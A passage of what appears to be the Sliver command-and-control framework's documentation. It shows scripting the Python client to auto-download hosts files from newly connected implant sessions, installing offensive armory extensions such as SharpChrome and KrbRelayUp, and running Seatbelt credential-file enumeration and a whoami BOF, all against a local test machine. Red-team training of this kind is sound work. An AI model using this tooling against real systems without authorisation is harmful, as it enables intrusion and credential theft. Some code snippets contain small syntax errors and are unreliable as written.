connected.\n\n```bash\nIn [6]: beacons = await client.beacons()\n\nIn [7]: sessions = await client.sessions()\n\nIn [8]: beacons\nOut[8]: []\n\nIn [9]: sessions\nOut[9]:\n[ID: \"f80ec897-0870-4f03-a1b1-364e5a0d243c\"\n Name: \"UNEXPECTED_PORTER\"\n Hostname: \"test.local\"\n UUID: \"c6de1a44-016a-5fbe-b76a-da56af41316d\"\n Username: \"tester\"\n UID: \"501\"\n GID: \"20\"\n OS: \"darwin\"\n Arch: \"amd64\"\n Transport: \"http(s)\"\n RemoteAddress: \"127.0.0.1:60218\"\n PID: 74773\n Filename: \"/Users/tester/tools/UNEXPECTED_PORTER\"\n LastCheckin: 1683185925\n ActiveC2: \"http://127.0.0.1\"\n ReconnectInterval: 60000000000\n PeerID: 4416183373589698218\n FirstContact: 1683185429]\n```\n\nTo run commands on this session you’ll need to create an InteractiveSession object.\n\n```bash\nIn [10]: interract = await client.interact_session(\"f80ec897-0870-4f03-a1b1-364e5a0d243c\")\n\nIn [11]: await interract.pwd()\nOut[11]: Path: \"/Users/tester\"\n```\n\nNow that we’ve got the basics of connecting to sliver and running commands down let’s write a more useful script that will display the hosts file when a new session checks in. Our goal is to first identify the Operating System, and then based on that retrieve and display the contents of the hosts file if it exists. Because this script will wait and react to events emitted by the Sliver server, we’re going to use `asyncio` to write our client.\n\n```bash\n#!/usr/bin/env python3\n\nimport os\nimport asyncio\nfrom sliver import SliverClientConfig, SliverClient\nimport gzip\n\nDEFAULT_CONFIG = \"/Users/tester/tools/neo_127.0.0.1.cfg\"\n\nasync def main():\n ''' Client connect example '''\n config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n client = SliverClient(config)\n await client.connect()\n\n\t\tasync for event in client.on('session-connected'):\n print('Session %s just connected !' % event.Session.ID)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n```\n\nAs shown above we can access the session object through `event.Session`. Let’s go ahead and add a few conditions based on the operating system.\n\n```bash\nif event.Session.OS == \"darwin\":\n print('Session is running on macOS')\n\nelif event.Session.OS == \"Linux\":\n print('Session is running on Linux')\nelif event.Session.OS == \"Windows\"\n print('Session is running on Windows')\nelse:\n print('Session is running on %s', event.Session.OS)\n```\n\nLet’s setup an InteractiveSession object like previously.\n\n```bash\ninteract = await client.interact_session(event.Session.ID)\n```\n\nWe’re going to start with writing the code for Linux and Macos, since in their case the file is located in the same place. First we check if the file exists, then we download and decompress it to display its contents using gzip.\n\n```bash\nfile_listing = await interact.ls(\"/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nThe code for Windows is relatively similar the only major difference being the file location.\n\n```bash\nfile_listing = await interact.ls(\"C:/Windows/System32/drivers/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"C:/Windows/System32/drivers/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nIf we run our script and spin up a few sessions we should start to see hosts files being retrieved.\n\n```bash\npython3.11 autocat.py\nAutomatically interacting with session 16338c85-b670-44ab-ac83-2df885654b07\nb\"# Copyright (c) 1993-2009 Microsoft Corp.\\r\\n#\\r\\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\\r\\n#\\r\\n# ...\n\nAutomatically interacting with session 93fcbab2-f00d-44a4-944a-e1ea8ec324e2\nb'##\\n# Host Database\\n#\\n# localhost is used to configure the loopback interface\\n# when the system is booting. Do not change this entry.\\n##\\n127.0.0.1...\n```\n"},{"name":"7 - Assemblies and Bofs","content":"The Sliver armory is used to install and maintain third party extensions and aliases within sliver. The full list of available extensions can be found at https://github.com/sliverarmory/armory, keep in mind this is community maintained so not all modules are necessarily up to date. \n\nYou can download all configured extensions/aliases using the armory command.\n\n```bash\n[server] sliver > armory install all\n? Install 18 aliases and 84 extensions? Yes\n[*] Installing alias 'SharpSecDump' (v0.0.1) ... done!\n[*] Installing alias 'SharpChrome' (v0.0.1) ... done!\n[*] Installing alias 'SharpDPAPI' (v0.0.1) ... done!\n[*] Installing alias 'SharpMapExec' (v0.0.1) ... done!\n[*] Installing alias 'KrbRelayUp' (v0.0.1) ... done!\n[*] Installing alias 'SharpRDP' (v0.0.1) ... done!\n[*] Installing alias 'SharpUp' (v0.0.1) ... done!\n[*] Installing alias 'SharpView' (v0.0.1) ... done!\n[*] Installing alias 'SharPersist' (v0.0.1) ... done!\n[*] Installing alias 'Sharp WMI' (v0.0.2) ... done!\n...\n[*] All packages installed\n```\n\nThese commands can then be used in the context of a session or beacon similarly to other commands, with a couple caveats.\n\nLet’s go ahead and run our first assembly.\n\n```bash\n[server] sliver (UNABLE_PRIDE) > seatbelt \" WindowsCredentialFiles\"\n\n[*] seatbelt output:\n\n %&&@@@&&\n &&&&&&&%%%, #&&@@@@@@%%%%%%###############%\n &%& %&%% &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%\n%%%%%%%%%%%######%%%#%%####% &%%**# @////(((&%%%%%%######################(((((((((((((((((((\n#%#%%%%%%%#######%#%%####### %&%,,,,,,,,,,,,,,,, @////(((&%%%%%#%#####################(((((((((((((((((((\n#%#%%%%%%#####%%#%#%%####### %%%,,,,,, ,,. ,, @////(((&%%%%%%%######################(#(((#(#((((((((((\n#####%%%#################### &%%...... ... .. @////(((&%%%%%%%###############%######((#(#(####((((((((\n#######%##########%######### %%%...... ... .. @////(((&%%%%%#########################(#(#######((#####\n###%##%%#################### &%%............... @////(((&%%%%%%%%##############%#######(#########((#####\n#####%###################### %%%.. @////(((&%%%%%%%################\n &%& %%%%% Seatbelt %////(((&%%%%%%%%#############*\n &%%&&&%%%%% v1.1.1 ,(((&%%%%%%%%%%%%%%%%%,\n #%%%%##,\n\n====== WindowsCredentialFiles ======\n\n Folder : C:\\Users\\defaultuser0\\AppData\\Local\\Microsoft\\Credentials\\\n\n ...\n```\n\nAs you can see Sliver ran the Seatbelt assembly and provided us with the output of our command.\n\n## Bof’s\n\nBeacon object files are loaded using trustedsec’s coffloader, when you run a bof command the loader will first be loaded into memory and is used to run whichever bof you choose. From an operator’s perspective bof’s are similar to basic sliver commands.\n\n```bash\n[server] sliver (UNABLE_PRIDE) > sa-whoami\n\n[*] Successfully executed sa-whoami (coff-loader)\n[*] Got output:\n\nUserName\t\tSID\n====================== ====================================\ntest.local\\tester\n\nGROUP INFORMATION Type SID Attributes\n================================================= ===================== ============================================= ==================================================\ntest.local\\None Group S-1-5-21-3109228153-3872411817-1195593578-513 Mandatory group, Enabled by default, Enabled group,\nEveryone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\Local account and member of Administrators groupWell-known group S-1-5-114\nBUILTIN\\Administrators Alias S-1-5-32-544\nBUILTIN\\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group,\nBUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group,\nCONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group,\nLOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group,\nMandatory Label\\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group,\n\nPrivilege Name Description State\n============================= ================================================= ===========================\nSeShutdownPrivilege Shut down the system Disabled\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeUndockPrivilege Remove computer from docking station Disabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Disabled\nSeTimeZonePrivilege Change the time zone Disabled\n```\n\nSince these payloads are run in-process, they have similar advantages and drawbacks as in-process assemblies meaning no new processes are spawned on execution, but a crash risks loosing the implant.\n"}]} \ No newline at end of file